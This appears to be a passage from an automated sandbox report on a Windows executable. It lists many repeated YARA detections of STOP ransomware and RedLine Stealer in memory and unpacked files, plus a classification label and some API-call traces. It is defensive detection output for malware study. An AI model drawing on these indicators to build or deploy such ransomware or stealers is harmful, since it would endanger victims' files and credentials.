          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000009.00000002.2156092371.000000000444D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2241428739.00000000044D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 348, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2716, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 5968, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2164, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 5524, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 4748, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 4144, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2616, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: mU2p71KMss.exe, 00000006.00000002.2024972997.000000000423E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =.COM;.EXE;.BAT;.CMD;.VBpZ#
          Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@18/287@4/2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,1_2_00411900
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_043887C6 CreateToolhelp32Snapshot,Module32First,0_2_043887C6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,1_2_0040D240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeFile created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117aJump to behavior
